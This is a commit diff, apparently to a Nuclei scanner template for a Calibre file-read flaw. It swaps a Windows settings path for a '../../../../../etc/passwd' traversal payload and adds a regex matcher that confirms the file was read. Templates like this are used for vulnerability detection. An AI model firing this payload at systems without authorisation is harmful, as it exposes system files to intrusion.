linux payload
parent
d284320ff9
commit
ef61b23e12
|
@ -34,7 +34,7 @@ http:
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Content-Type: application/json
|
Content-Type: application/json
|
||||||
|
|
||||||
["extra_file", {{book_ids}}, "..\\..\\..\\Calibre Settings\\gui.json", ""]
|
["extra_file", {{book_ids}}, "../../../../../etc/passwd", ""]
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -43,11 +43,11 @@ http:
|
||||||
words:
|
words:
|
||||||
- "application/json"
|
- "application/json"
|
||||||
|
|
||||||
- type: word
|
- type: regex
|
||||||
part: body
|
part: body
|
||||||
words:
|
regex:
|
||||||
- "No such file or directory:"
|
- 'root:.*:0:0:'
|
||||||
- "Traceback"
|
- '"result":'
|
||||||
condition: and
|
condition: and
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
|
|
Loading…
Reference in New Issue